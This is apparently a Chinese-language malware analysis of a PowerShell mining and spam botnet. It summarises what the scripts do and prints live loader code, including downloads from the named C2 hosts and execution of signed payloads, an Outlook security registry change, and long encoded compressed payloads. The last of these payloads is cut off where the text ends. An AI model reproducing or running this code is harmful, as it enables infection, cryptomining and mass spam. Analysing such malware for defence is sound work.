$rsaParams.Modulus = 0xda,0x65,0xa8,0xd7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82,0xff,0x2f,0xff,0x73,0x53,0x9a,0x73,0x6e,0x6c,0x7b,0x55,0xeb,0x67,0xd6,0xae,0x4e,0x23,0x3c,0x52,0x3d,0xc0,0xcd,0xcd,0x37,0x6b,0xf3,0x4f,0x3b,0x62,0x70,0x86,0x07,0x96,0x6e,0xca,0xde,0xbd,0xa6,0x4f,0xf6,0x11,0xd1,0x60,0xdc,0x88,0xbf,0x35,0xf2,0x92,0xee,0x6c,0xb8,0x2e,0x9b,0x7d,0x2b,0xd1,0x19,0x30,0x73,0xc6,0x52,0x01,0xcd,0xe7,0xc7,0x34,0x78,0x8a,0xa7,0x9f,0xe2,0x12,0xcd,0x79,0x40,0xa7,0x91,0x6a,0xae,0x95,0x8e,0x42,0xd0,0xcf,0x39,0x6e,0x30,0xcb,0x0a,0x98,0xdb,0x97,0x3f,0xf6,0x2e,0x95,0x10,0x72,0xfd,0x63,0xd5,0xf7,0x88,0x63,0xa4,0x7b,0xae,0x97,0xea,0x38,0xb7,0x47,0x6b,0x5d
$rsaParams.Exponent = 0x01,0x00,0x01
$rsa = New-Object -TypeName System.Security.Cryptography.RSACryptoServiceProvider;
$rsa.ImportParameters($rsaParams)
$base64 = -join([char[]]$sign_bytes)
$byteArray = [convert]::FromBase64String($base64)
$sha1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider
if($rsa.verifyData($raw_bytes,$sha1,$byteArray)) {
IEX (-join[char[]]$raw_bytes)
}
}
} catch{}
}
SIEX "$core_url/report.jsp"
try{
if($isn -and $is64){
$nd="nvd.zip"
$ndg="$env:tmp\nvdg.dat"
if(!(test-path $ndg) -or (Get-Item $ndg).length -ne 22035968){
(new-object Net.WebClient)."DownloadFile"($down_url+"/$nd","$env:tmp\$nd")
(New-Object -ComObject Shell.Application).NameSpace($env:tmp).CopyHere("$env:tmp\$nd\*",16)
Remove-Item $env:tmp\$nd
}
}
}catch{}
$hks="HKEY_LOCAL_MACHINE\SOFTWARE\"
$mso="Microsoft\Office"
$wnd="Wow6432Node\"
$crm="ClickToRun\REGISTRYy3dMACHINE\Software\"
$paths=@("$hks$mso","$hks$wnd$mso","$hks$mso\$crm$mso","$hks$mso\$crm$wnd$mso")
foreach($path in $paths){
if(test-path Registry::$path){
get-childitem Registry::$path -name|where-object{$_ -match "\d+" -and (Test-Path Registry::$path\$_\Outlook)}|foreach{
$skey="Registry::$path\$_\Outlook\Security"
if(!(Test-Path $skey)){
New-Item $skey
}
Set-ItemProperty $skey ObjectModelGuard 2 -type Dword
$mflag=test-path $skey
}}}
if($mflag){
try{$localMail=$flase;
New-Object Threading.Mutex($true,'Global\LocalMail',[ref]$localMail)}catch{}
if($localMail){
if(!(test-path $env:tmp\godmali4.txt)){
SIEX "$down_url/if_mail.bin"
}
}
}
if(!(test-path $env:tmp\kk4kk.log)){
SIEX "$down_url/ode.bin"
}
脚本主要功能
- 尝试设置DNS为
8.8.8.8
和9.9.9.9
- 下载文件 均为
powershell
脚本
- 如果不存在
%temp%\kk4kk.log
则下载http://d.ackng.com/ode.bin
- 如果存在
Outlook
且不存在%temp%\godmali4.txt
则下载http://d.ackng.com/if_mail.bin
(邮件攻击模块)
- 下载
http://d.ackng.com/if.bin
- 下载
http://d.ackng.com/kr.bin
- 如果系统为64位则下载
http://d.ackng.com/m6g.bin
- 如果系统为64位且存在显卡则下载
http://d.ackng.com/m6g.bin
- 下载执行
http://t.amynx.com/report.jsp
- 如果存在显卡(N卡)并且系统为64位则下载
nvd.zip
- 回传以下信息到
http://t.amynx.com
,格式为
- 操作系统
- 系统位数(是否为64)
- 当前用户
- 域信息
- 磁盘格式信息
- 显卡信息
- 内存容量(格式化为G)
- 是否为管理权限
- 3个下载的文件MD5值
- 通过矿工程序提供的接口
hxxp://127.0.0.1:43669/1/summary
获取当前机器的总算力数据
- 机器启动时间
- 每次下载时判断返回长度是否大于等于173,如果大于则解密前173个字符并做SHA1校验,如校验成功则执行下一阶段脚本
report.js 结束进程脚本
I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd07601c499625262f6dca7b7f4af54ad7e074a10880601324d8904010ecc188cde692ec1d69472329ab2a81ca6556655d661640cced9dbcf7de7befbdf7de7befbdf7ba3b9d4e27f7dfff3f5c6664016cf6ce4adac99e2180aac81f3f7e7c1f3f227eb76f9f4ebefb53e96769fa519ade49efecefed7ebf3efef6c9f7461fffa287eb8fd3fce4b85ce5f576faf09ef9fc8b67edc7e9e9f4b87c79faea643b4d3fb5df4c5e2e3e765fdcf9f8374e7ee3e40e357ff7c5c79f7cfc8cfedf7ef27dfa77e71efdf3bd53fa6741fffff2dbcd8a7e4ce8ff2ff13737d9ff1efd73fac597f4efb75fd33fab097f97d2ffb7d2710ad43ef9f8ce3efd43f8d2bf754608d0cf11f5f6e4bbbf887ea35fd234a75f4e8e9fd300a6842886907d1b1f7d0fede897f2e1f32f182fc0c658b929fdb14dffa77119c868feecf57700162369a929fda4d6f42f60df1128bf44befd447ecce4078624f8d0bf45d3e4d30a6057e3df1f5fbffe02edf9bbefa4fa06fe2eb631d6c612ce412100b6997e2300b757f8d936bfd8a20940f3690624d1022dcf0508be213afd922f2cb6e5170e55d3e943e9413b7a4eff7c6b7fb293fb4d3eb1bf4db2878026f0f72d60feead37def05ee67f290fe39c704665fd8a13cfcd435f33b41d38307bb963cfc23c3cb073bf4cf7dc0dac19fe7dfa27f4a462100d23e7cce1f2a7a0a33f586fcaccddf16a521e672dbfb5a7ee4cbc242d3379ecf96d922201178b4026b8c7fff67605b704c3a0340c70bf462b69d96dea89f7f6b594cc6989eb7df12e44d0ff4efc3e76084fc2dfd53e877962ea5a0f9b1a3cac732b2dc60653e5be275c6776146c56f55f4afe0ebf0f1185dc12936406406485980050d0613f03c7f67bb7dd68e3110331850977e9d37f44f1d52f58afea92046248ae92fca7940b92180e96191bd1069a1ffbffece2fc68b53e6c23eabfc34fd33f9723baff339fdf6dd27f8e717b1d0d58ac94bfae8f7dfbb877104c328becb126751c6670d64a704819c40318af8729a4b671fcbcc2cbebb1da119feca3fb7b3bfb545ff4bb7ee7cfcf18ba2facef6f7efef8df6e97fdf9be6abe68b2fa78f2e97f9ef966ea5bf10eaf830254db7b575795c9f654fca3cfdf85b8b59fdad8fef8c5f648bfc7bf746bbbba3bdef6f7fa73a7bf1f1c777e8a5efbd7e5317cbcfbfffe8d177be3c5b6e7dfc713adafafc2c4d7f92001c4f9e9f3e12559fde195f66cfbfcabf976eefa6e371ba4df86c68362ef3e5e76fbe7d27fd3e5987f4374efe1f'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
解密去混淆后如下
& ( $env:cOMspec[4,24,25]-JoiN'')((('(('Get-WmiObject -Class Win32_Process|Where-Object{JSF_.Name -eq powershell.exe -and '+$_.CommandLine -like *kr.bin* -and JSF_.CommandLine -notlike *f4095084ad178f69a4f9b46b49abe0b4*}|foreach{stop-process -id JSF_.processid}')-crepLACe $',[CHar]36 -crepLACe '',[CHar]39 -crepLACe '|',[CHar]124)| . ( $pSHOME[4]+mPbpsHOmE[30]+'x')') -CREPlAcE'$',$ -CREPlAcE ''',' -replACe '|',|) )
该脚本干的事只有检测当前powershell
进程中是否含有kr.bin
进程字样并且值为f4095084ad178f69a4f9b46b49abe0b4
,有则结束进程
if_mail.bin 垃圾邮件攻击模块
$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd07601c499625262f6dca7b7f4af54ad7e074a10880601324d8904010ecc188cde692ec1d69472329ab2a81ca6556655d661640cced9dbcf7de7befbdf7de7befbdf7ba3b9d4e27f7dfff3f5c6664016cf6ce4adac99e2180aac81f3f7e7c1f3f225e5fa65b1f7df9d1271f7d7b39fbe84eba95a61fa577ee7cfaf0fbafb2f9f47ba33b0f3f95df3ed97da0bf3cdcd995dfb6f269f6fc65feea647b7f4f3f1a7dfced57dff9384ded3769fae93d03ead35d6de5407cf2503bda4a4f4fb2f2655e6fa70fed0b0f4c97f7ed9b7bfa91d73ebdf3f16f9cfcc60961fd45f3edd3cf17f42fa1cd6f7cfbe47b9f1c7caabff000e897adadd3e931b01bdf61dce8a3ef7fbe2c5eb5cdf746f4eed3f3effc34fd708df6bb8dee7c6a401ed85e760ff4973df3cbc1c35e770496c8c3f87d6a9a19ac1c9e9f5aa07bf77b201e46305ede7ff6e60701ca7bdab743f981edc674bcafc03ff974c7f477dffc16e20ceaca7ff9b4aeceb7d3bc2cced37c75dd6ea7edbb76bc5f94d962565d7cf17b7ffad3c56ad13eba5ce6a062bac8db62fb2a5fe2d55fc2efcfaae9ef5f16d982bf7e777af5f4f3b31fc317bf386fca9c9b3cb9fc895793f178dc16eff274b6ccd27c593de50fb9e19dad769a2f97d5c9f8ce1dfef441f18bd6f9f5b7bfcd9de7ab62c5bf8cf95ffe875b6d2db2bc6e5fb7cbbc284fa8d5cb59bec85e8c1bfc3afef26c4c9836d7af5382fdd3930a286f696f7953ad9ae2e9189081f4a1fbe8aa910f82416de5cbe2390dbbfeaefb5e5fddaaf973c124dae967e6153b48d7edcfd660d1efc79f7cfc99e949c67d676b51d46fc6b3c5b46972466a6bb63899e6ef4e67cbe3665915f4f1ebc57a79fae8d1f7f9cf65debe3ba50fa755fd72dc9445fbd5f71812f3e69d2d6aa243aaab676d917d97a68fbfe27f6e9c43d75427b2ce2febfcf5ad26f2f00e8d824720fce6cd6064526b3303b3e569f566969108c8479f2994603ef1fda6f9b4d0fae3777dff70e86027389d6ea76599cf9b3abfaa560cec336f9e451c55b8eaaacdeab62996c56276cc9fa4dfcfcbead5f2ac2d8bf593e6aa9a2d8bef8ecb6c554c9705cdfc3571f87a9abf26dbc0cd9a339ae82d12bbba5e9fb4f9e7c42ed484fe9e9d6d78f9fbf6b34d3d6c9d17ccab65bdfefd97d40ed88f18c9e7afbefafd5f7cf74b511bb052e52aafc7dc30afab69d8f0f4d5972761c3df93896295167f69b5103e59153ff8fddb36733a2ebfac16798daf9a9f1efa665acd86bee26eeea5f90f8a06aaf5f7f7e1d3b42e830fa06966cbbcf9fdcb7cc69375ffebbeb88f17bfce8b77ee7f72ff77bfb3a0a9c9eaed36bfd8da4a57795e36fca551e0d3e9ba21fecbdaa5503cad5a86444a3d7f2dbcd436d57c1b4af14ab52dbe1a1b551a40e3372f96857d59dee05f09d771be2059acf9cfd12efde7e1bf359b1d8f1be2b9c59cb0698fc30e04044d4e0f8437619b415ccfaa89b36a9fa5f4f793b085c8e1baf15bf147a479d79d11dff16866fb2d88fd491599869f81813cf0e99d9d2dfae82c6f690427e3b2e24601d85f7ca7f1276359f873b345c322c938b7ccf84bf89d45559ffffe97d3bc66709ff8007e4c81064dd26659708bb65a6ea77e7392558345f806e1117c308049d5fefe448566180fafc1adb0f0dbc3fe15a9f7898f04f93f9fd0ff3ffd1ab282d7bfbffbbdefbfcb4987fdfe242b68f1bda6acaa956584cf02e6e137766e78a3cb4b7869de5e2cf3721cb60c44f4b300a630da725d4dc7e1847cc2fcffd9bde92fe45f3ed1361e71b4c55ea78547666db13bfd8575deac05e9f52f04569fc169fc3d9655f3d3e3b6ae48d7de0d55350938999b59569550e8e33becaf4d27f9d5b8cd97ce98bdd802fe76d4777c616ff2f67a5296196499ac0d666c5c15dffb2c367d80e14fdeaaf8a96d92b89ffcfc69bbef29f2bae0a9143bd09970e7627ee279be9f753a89a9a9cfbaa0644c6487ebd92c5bb58b667c6717525d4003108da7d9581cafc608b8252f4fe79d4fe19194e45f94ebec3c7f4ae6565f78ad2f6cb9b9fefd8927e4adfb37bfa5b3efded9d9bdf9256508f3123ca06c5a94ab55367e5b5565bbae48f22940a45925b7eca7275f6e5fd1cffcc56702c02980941efcb2b3733f6d6604326f8ab22c16db6274b6db3a6b5fa7dec338c21d2acbf5b331269d31caebfcdbd72b38d517d9db69f69248cfd3db7933fdc5f6b73bed7ab52c444714a905a4da4155afeb6f89160a15cec4ea35fb646ee4c7ec7731bccfd23e165d32716b22d29489a47e1cbd1905a8ef335296641488376576ae3d5e97cb2fe1b1c229b3e86af7c4e35b01fdee1ceca6df4a9953efec7cbfe6981b2d4550d34fd24fe543faedbefd8dbffcbd5e6a9b6e1fc443e00852478ddf95a5f79d3b3d2acedb6cb5dd924c6fa5d0e6a4c04de33ec9bf2fdae37be41ad7d9ca42172167c166ca4d97ebae75f9253f667ef0cfb734bd931fd33f8c0322326efa7c36664740548ee8bb47f2493a6f8b2b7174f2362f73d16cbeaba38029e6e0efe1aa338f992f7eb1908149f68bf26d43c6a04b5832d3daf74b0c2cf0abd7dc70ac74cc2d54b3f0bf248bbfbf481d71894347c06f6ff39f8724f53b7bdbac895a0690b617dba9c042a0be4d4e88f7d1a16bf9997c6244c6989db0e7cf5c7bc1f2222b45dc6ed0349f39188ab17973049d2fbf283db77cf36cb881ac7f9721eec02a5b628ed4e2da0fb646e4845853fba8cc265579812f7edc3292cf4ff9bacc2ec762073f31cad47bcb4dbcd7b2e3c5f4df722cf063c431d51b875d93cfa76db618bfcb2f3c2fabcf0870c672300153f8dcb0001a1b50beaa63469eb0c1fb25fba3bd5ffcfd9fda3efe9e04a79f7c7f7bfc707b071ffc9ef4fb27bffbef6ffe94f6778adf638b5fff3ee3f43d62338b9c92caa3db1dc147c612582cc7f3ae09f0f55ee88c7097f42ca94f6139af997a82fa5187049f792dc30eb54160126fd02a62d08fc129a70404118e212f71831d5ec80fdae9f0ab1df688816106890b7c67c6370bfdfd6f5ae83bc4ee087e9fd6010bdc8edabb4c339fd0ea8e6c2073e79d781811a3ef7bcad130af7b2ed30f8dd36fe4740fa980f62ccfb3d9f6175f6c5fd3a3662e5b50828b6c16191eb2f39f7f46bfcc7e7f4afe7060c003e67fb8755ba4cb7c559174de7fa6611665b7b2695aa4a359beccdf56f5246dc4f192b09cfffd3d08c1ba4aeb75758d6f9b62fe461c0e401e59d070b419b4c21c49d67adea6efe867d592da27d39aaec8834a018a1a799d706341a1077c3e5d532e83a697fccfb7e928bf9ea4b38ad2df32040f08257cc9c423db7695d7d9f96d01f968f81ff9affe1e40995d8d8b65555f11b362a044fff9d5ef8a8762bd8590e89c084cbe367e25243cd86fd753a107bdf4dd5e071ba1c47b47e71efc676ffa50d919ceeb6953cc38b9cf0c954917241f7011176b4abca4b35cdda93c6ff0fe38afd7edfa3cad33728191bc68e99f665d1575764903406ae8b2a86b6a3f217a1362c421b35c3eba2e092ca98f34bfcce6699951fc59e7ab747951a04b0a0be657d4a6cc28c5b26af27459e75362780c99e22b621d62b2d75fbd3afbc9f4f8c597942cc417ec228220443f6fc87eb347bfcfab2f5f9ffde4d3e3f4db6f9e1f7ffb9b23c5c3dded5971599d702b8e0516d53948b2cc10542f8af49ad2c21e565f7efbbb29b79021be4ee9e5654a609e9efde4979afbf410a3d0a2ce17c7182639de88ad66a4c6965f71a2863ea28084c9b506bacdba2e7ed2ebcb40c5dbf3765dbf210a79e2b9f57b7e16759c58299044e2fb982de3eff165df0fb25ff53534be92b4a2c9e5dfb9737676f2fa981203c82556d3e5e9b87d97bff95e3abac366604583cb9f226f30abbe103f139f9da8cf29bf7f79c6ed7505e3e9c1f9f5e73f78b9bc6cbfd8fde4c1ddbd9fbabfb8fbeabb6f57f5ab373ff8c9fde9bd83eae0f9273bedfa275ffee0e0fe5efb60ef7af99dbd5f74ffcd4fcd1f7c727577e7d3e7f5cbe5ddbb0feedfcb761f7c77d9bc3b78f0e50f660f7ff0e0fe64ef07e7f7bffabd0f5e7eb2aa7fe2cdc37bf5e4e4f2a7db4f96cddd073fd82daac9bdf3bb3ff8e2f779fbe0f5cbecfeef7df9d32ff73e3d7851fed44ffee0a77fd1dde7d7dfbdffa6fe74b278d8fc5e07e77bd307eb375f7e72f0e0dbe7cfbeca8bddd5dbe7b34fdfd50f1fbcbd3b9b7cfee979f68387fbef7efac10fee365f3ddc7df0c9e43bbf68b15efde0177db7f9452fefefffdecbf6db0f7f7aefa79feedf7bf972f6d5e7f5ec273f6967cbe9e5fdbb97bfcf0ff2fdc5e70f5efcc4dddd1f2cbf7cf09d1f3ca85f9edfffe4a7eb97e5ec61fdba3ea89bf5b77fe2e1570fca87bb931f7c79f9e9fe83d76f67bfe8e1e5cbdfa7fcc1e57571f9b27db05f93c978f183fc41bed7bc7c70fd7b7ff7eec1a7cf7f9f17f71fbc3cbfbe7bffe10fde2ddffdd4fae0934ff6df5c9f3fbcf76ef98b3eb97ff27bbfbc3ffbe4f2f2f79e962fefdf6dda8387f9c3bbbff7dd83ebb7f7effedeedf54f4e7fd1fde5d3df67bfbefc89870fd7f7967767f77697cbbdb7f9ddcb072f1eec9c669fccdafcf88b4f7feadbe7bfe8f9ef75f7a71e7c7bffeac1b75fddbdbbfb74b95c3fbc7ef2f0c10fdeac3ff98907efdefcdecd7472ff0b8a68efffe4dddffb27f2dd8bcb4feeff5e0f3f5d7ef1e060f7c5f2f8fe270f3e7970fec957bb0f660f8be6e5f9831fd4cfcf3f39f8a9ddfc61fbf0b2b93b9f7cf2257db7b7ae3f79b1be9c7cf27b5f4e279ffee4f9f9fae1c14f9f177bcfbf7bffed4f5f5efe6072f6f0d34f1ede2dde2e2e0f0e28d175f7e12fba7c7d75f9f4e1779adffb72377b4844cd3fad97b3673f7898ffe43a3fbf7c70f7e54f9f1d7cf274f1f0f3657eefcd27f4fce4771feedd7f767049c0ef5e3cb8f783ef5e1fdc7d792f7f78f0f4cdbdcbfcc18307dfb9febdefe6e777f7ea4f76279f5ceddf7bf3fcf95d5abffee4f7fef2bbfb4f4ebffc4597e73f38fffcf207e73f79f7f4b2bcb77cf0f0aedab397bff7fe93af669fccead5cef977bffae41e71d2fd870f9f7cf7bcb8bf577f7bbef3fb5cbfb9dc39dffbe9cb873fc88a4f2f5f9e2f7ef2e5ddbd9ddf7bfd8b7ed1ddfc171d5cde5d3e7c39bd3af8c9df9b507bf0faf83bf73ec92fef7df2f9f9f2d3bb0707af2e1ffef483e7cbd9c9c3bbf756f9279f34cf2f2fefadde5c7e726fb57e7939dddf7dfaf2f29367f7cf3fb9577f7afd66f1e0f7beffc9f4f77e787f7259dc5dcd9ebcb9bb3e9f5edefdc9fceecbdfe70777270f9e97f75e5e363ff57cfde017ad1fdefdc1eac9735a855f7cf283874be2f5f9dde5e4f5c3bb7976f7e9bd17d377cfce7fd183fdbbf70feadf7bfd83073ff841fd8387ebbb7b3fb87cf98698e93bcbbbe7d377f58397af5edc9dde2f7fefbb9f3e7df6ddfdebef1c2cbfbc7bfde90101a1266f1f2eefde2feae2cbc9bdebdf7b76b5a8cfcf6735cdf1f9fd670f1f34f76866cf774ebed33eb8fce43bbff7f964ff17fde0727dbede7ffae04be2d7d9bb87bf68fef2653efbbd7fd127cdeff3f0eef40717edd3cbfceefd4f7ed1a7d5b72fcf1f5edc7b7879efe06e76efe97272efc1f2417b37df6d2f973f917f7af0fc17dd3d9fbd2b7f9fc5f28b8377bbdfbe7779f7fecbf27cf7ab875f1dac7ffafccbf3f39ff8a9f6c14f9edf6d5eec7f72f7ddec17ed3d581e1cbcfbbd67f577da9fbcf7530feb87ed626ff67b3d5c5ddebdf7fce5fd8bafeebefcf6f9cef3bbf77eafe50fee2f9b83873ffde6a23c78b8735d2fce2f69b86f5eb6773f59ad2ef7ee5ecfeaefe6d76fce7fd0fce4f9eef2e5e5834f5fbe7870b0b7bcfbe5c383dde7e7f99bb7e5b387e77b97fb0f3ff9453f783e7f43d37970ba7bfec99b07f92fbab7fce4e14f7cfa83dfbbb9b7ffd32feffee0e5dd27bff7c1010df86e7effee7271befe74effef9c14f3efcbd0ff6dffddeaf567b0b426af2f0c1ef5ddefd45f7ceefcf7ff0dd2f76a7075ffde0c1c3d5f9cbdd9ffae4d3d9e7d9ddecfacd9bc9f9dd83fdfb4f7fef7c72fd9dfaee6c77d57e9537fb073f78fd60fefa93fbdf797e7effc583d9f9fae0e09383376fbebc7ffd837bdf7ed9dca3aeee7ff2e6abf39f7af27b5ffee4f493dd77cb3cdb7b70f7e1f52b62c28224f8938383dd6fffc4f9270f0fbe7af766e7fc7cf761be7bfff7befb60bd3cfffcabf5bdef90b2bbfb70a72c7776efbe5c5e7c7279efc5dd9f7cb8bebc3c7ff1e6a75e5cfef4a7572fef3e7876f793d9c127f7dfbea83fd979d03ef8453b3f20a6fec12707973fb877f1f0eefaee973f7d77ddfcf4f50f966df68bee2edfcc1eb63fb8bc6c26d7f77f507ffbf2e5c3d9f3cb0707ab7b341f6fbe7d70f0f0fec17aeff75a9e1ffca22f1ffca26f57d7cbd9f5cebdbbcf0ececfcf771e9e7f79f0e997bff779fef093faf73abffb5377ef9f13763ff8bd7fd1a23978b6fef4e2ee2509f3c3b7777fef7b2fdf3cbbfbfbbc2af72614485eefdebbf7203f78f1fce1779ffdd479f6e9f3efbe7d46aaa37df8f2e1fe0f5ebe5bad7feafc935ff413cb575f7efbf2de77962463f7ebf5837279f7273fb9bafc76b3ffee075fb42f0f1e3e7cb8fbe5c54ef1e041fdf072eff9fd4feadde50fd62feffe44f39d7bf73e79f57b5d1ebcfec99fba7e783925392f3e79f96052fc74f5267f77fded9fd85b7efbf7b9bcae4f4e1e9ebffa7df2e7e5effd839f7cf049f110703e39b87ef2dde99377777ff0a4addfbdfee4d3c5a7df799e5f5f9fcfdfe6fbc5b72f9b1fb40fbf3bfd41f3a0bdff8bee7e72ffab7b97bf37f14f3b6bef3dfce4bbbb6f9793bd5ff4edabf3bd83cbe96559dfcd5efcf4de836f5f5d92cccd0f3ef9e97be7539289072fdb039aeedd6f379f3eff89377bc76fc9329cbf3df8f2c1a73ffd7bbf9cdebdfcbdbf7cb877f0f2a7eebef9f2fc8acc5cb3dffef49707cfeffee06eb6f783faec07e72f3fb9faa9f5e2e0e5839da7c4e46433d79ffcd462f5ecbbafdeed2ec908dcfbbdcbf3bbbfe8e1bdef5cdcbb7cb037bbfb6ceff2ee97b3bb0f97bbf9efbdfee493f58c3efbcef5dddffbf2d3bb0fbef38beede7bf8e0d39fbcfbb2bcfbe2d977af08d6c1eae9a7b34fee9fffdeeddda6be5eddffc1eca79e9f3ff8bdd7f927bff7e79f7c727eb9ff8b7eef87eb1fbc3cbf2abf7d402ae7e1c3eb9c88fae9f2eee9d5f21e999f4ff3d9a777cf0f767e8a08f2d50f16b39ffaa9dd9d66f7f4277ed1775eee3e28de5057f75ecc76bffdfbacef9d918efcbd7ef0e0f73effb27cf87b3f7c306b5f5ee69f7c9aff20bf7bfcfcfcde8397f7777eefaf76762fbffb7095bdfb64f27bbf9efddef9e5eccbdfe7fafacdb7ef9eef3dbcfbf0e5bd62fdd39f5ce63fb84be2fc83aff6f2bd7bb3cb83e6c5f9f5939f5efe3e3ff153bbed279fdc9fcc7e11e9ef9fae0fde7cfbec938b4f1e2c97b34f1e3e59ee1f90919cccee928dab27f77ff0f2d9170f49b1be5b7d7a39fd2a7fb8fac9970f9e9359fde4f7feee27ed2f5abc7e4ae2d534efee92cff0edfceeeff3eef9effdd5f493c5ef736ff632bffb9dcbd90f7ed1c1effdc927f7caecee27bfcfcbdfeb72fde07a71f7179d37bfd797cf76abfb7b5f65edf33559ea870f7ff064f9f0d3fbe5736a7b7672b9f77bdf7df9930fcb7b64fa7ff0e26e49927ff283731ad0c5ef7df7fc3cbf5fbcbd3c7f79fa66458a78fd7b377be7e73f38c8df913d797bfd83ecf7bebbdf7ef7de247ff88b7ef2e1eedd35a9ceefdc7dba4baef6efbdbe777e70f06056debbfcf4deb3e927f5ef7df7fe0fce1f166f3eff7232270d7ffef2e1fd9f6c7eef83773ff97be79feeffde97ebbb9f7ee741b53edfbbbff3f4727a953f98963f597fe7e46e75f7c1937beda7df591e143f75fef0076fee37d337072f7eeae10f26e5ef7d3efbf42767770f2ebf3d7df08b96d3d50fd67bf77fefdffbfc6ebdac3eb9aeefffe0abcb070d744db1fceec39d83079f7c427ed7f31fbc7cf570fffe0f7eef6f37abe7e7b3bd65fe3cbbbab87cb9debffac1b7ef4d3e99dc7b71be7f70f9f2deec2757d9a7f5cef9f58bbb0f4e49b68821debc9cedafbff37bbfb8fb9054c60f96649a7e40bd4d5fdd5fde9bdcfbc1d3fafc8b07e5770fbe7cf89377f3ab834f2ff7576fef7eb2f326bbff747779f0c9f4073f758f1c8d9f7afa7b3ffce45ef37b3d7cf0e00d89e0c3df7bf969fec9cec3dd4f9fbe7e71f7fce14ffde0eec1de93b7f75eaed63ffdf2f2f2ee273f987ef2c97271705596f7da1f3c7bf9fb5c372fefbe396f7f6f12ce2feeef3cb8bb5c3edcf9459ffedef9bbc5e5fedefa9387cf2ec9e9b9f7eae962f17bbd3c3f7ff8e99ae8f793cb83ecd543fa78d62cc911f8eadd8bf3fba7bbe4a95f7e37ffbd6916f73e395b91ee78fef0feb7df9273fcd5c3f9dbbde70fd73f755dfe20dff96476ef3b3bbff7c3fda78bcbbb070f9feded7fb2aa3eb95bfe8074faeaeef3c5dd4f2feacbd7f3dffbfcc14efdf2a7dfdcdfb97e70efdebdf35f7470ffee777faf970fafbeba7ff7de9b9ffabddf3d78f9f0f5b2be3e7f77fec9f2f9f9ddeb67a7bfd7dd2f66bff7ecee83d583f9c377bb6f7ef2f2a71eec2c0f7ed1f397b38777bf7def9c120f2febcf7ffafce1fdd9b729202a7fefe3bbd32f76df3ef874f1c9a72fbff3ecfce0cb1fdcbbfef6e54fecfede2fcf673ff980d4e46a75f7eebde9275fdd27dd90ffa2efdcfde4dea79397e73ff8e9bbcbd5773fc9ef3e3c25aff8dbe79ffc44fb60f73c3f3f7ff79d07f9ee4fad96772932c93e21af9554e2b37b07cde55d128ffb6fbe7cfe93afeefee0cb1d9aa5dfbbcaefed91365b1d343ff5f2d5fcf75e1edc3dfff4c58b779f3c58df7bf9b0a9bfb84f5e6ebefb76f7f7def9ce83b3f5f9cbbb07ed0b327ce7ed8b87bbf7be2c27ef7e7a5d10191e7ea9ae64f583fdcbe75f3e38f8e9dffbdeeef3bb3bdf7d71f76afe7b5f3eb83ffbbd5ebeaceefe22b2b09fbcc977cbf36bb2e5bff7eeef3ddb3bddfdc1b7bf4bfcbbf7532f7f6af7e0f2171d2c5efed4e58bf357f7576fd60f3e59d2e4ddfd453ff572f7fcd31f904bf93cbffb53cfeebf24b7ebf5657effd3378b8707e5173f987ffbe5dd9d76462678ef7cb92eca835fd4aecb2f1fecee3dd87bb23c7f58fde0e1417d7ef97bffc4f9dd4fa6773f25edfaecde4fbe2491267f8b4290f34fae9fd53fdd7ef7cdddfbb3ddf3ab3dd2da648b306b070ff79e3f2bcb074fefe6c472f9f92ffae4275f5ecef61f3c78feedf5ecfebdbb0f9ebf9d1edf7ff77b7f1b8ee872fde96efdfce5f493eb7bcb97e73f39bfd79e3c859bf19debcb6a9f6672f7f4175d5e5e7d7aef3969962549eb0f2ebfa8ef950fc86df96477977c866fffd4738a0ac8d8bef9eecbdfe7e2cde5ddb377fbfb179fa3dfe2c1bbc9effd533f2056f9bd9fcf0e1ee4f72e97c03edfbdb7fcbd5fe60f7f62efcdc99777cfefee3cb93e7f79befff0de970f7fea697ef7faf4f79eeedc5f3effe9a72fcf77f3573fd9e4bf88b8e7d3faeec3fa9377c5ef9d3ffceadedbdffb27aaf3f3fb939fa6cc15d9eecb2fdb672f7ed1bd97f7a60f9ffde03b0fb2f3fbf75edc7bf9eaf2e5194d61fe7071ff723db9bfbbdcfd453fb8f7c9fd37eb173f794264a0906b76ffdd9bddbbfb3f79b7a5017c7bba202dfcd5a7bb0f0ec851695f9240cc1fbe3e206120109f3e78f3e6a72e2777ef3e25afe741fb29f9949feccfdfd05cde6f1fe4e79fd493cbfb3ff58b0e3e7db87c73f9e57db2154575b7be7ff9e5bdeb2f1fe6f3831fbc7cb8a6d0e62ec179f07bdfdd7df3f2c1db1fac7fd14f52c07097ace9b797e49cbdda3dfff6e5838cb4f6d97d521207cdc3e597ef0e7ef0ee93ddfa1e254f5edd7f7059bf7cf9ecfc9ad8e9f421b157fee0e0076ff6890dbefce4e2cda7d34ff69be77bf9dbeb76f6e6f2e1e4730a6d7e4031c0c387dff9eef2d37bbff78b87edecf7babb78f5e9270549e577c807dcad8979df90426a7ff09ddffbe54f7ef290da92a67cf6f2f2e5e4e1cef3cbfcdecbfaf28bf9b3eae0124ae6dd01b9c6f5cbcbdfebfef54fdfbdbc9cfe60d14ece0fee4e7fea8ae6e5faf7fe6a76efe2c1e5771fec3d78f0f2927ce1873f585dfee40fce49182fcfef1f3cf8cefaeee5cbfb2fee7f72f9ecf92f7a70af7eb3de27769e5d7fe7fceeecc14fbec9efd5e47bbcbbb77cf88b0876365fee7cf2f26d7ed03c9f5dffe0cd27cbbb0b8aac77f6eebe24a7f1f7fea9e7f9c53e79bf3f589efec4faf73e78f0648f06b3fae997f9c1ce839793fae5c383bb9f94fbc54f5fbe985fee3793bb9fecbfcb0e3e3d69bfbb3fffe9cb7c5a7cf2c96c79b7a1e06cf9139f1cdc9ffda21f7c7af7f5eeaabe4b0ef24fffde3ffdd32f579f7cf7cde90332170f7fe2f7baffe5e5f9bd4ff6ef2debefaef79f5c920c3dfcc1c307d739e9a4cb697379f9fb645ffce41579ec5f36f7bef3c9c3770f7eef07d9e5dd57f7c9085de70fde2cbefb7077fef2c1bdc964f6f0e18a78eb7a8f08bb3cbf9c4fdfec9361c9774fdffdf4720d27ed799d7fb23c7f757d41ec9fdfddfb4e494a12f2f8ed2f5e5044f76032a16062b7fcc987cbf3bdf3a7afdf3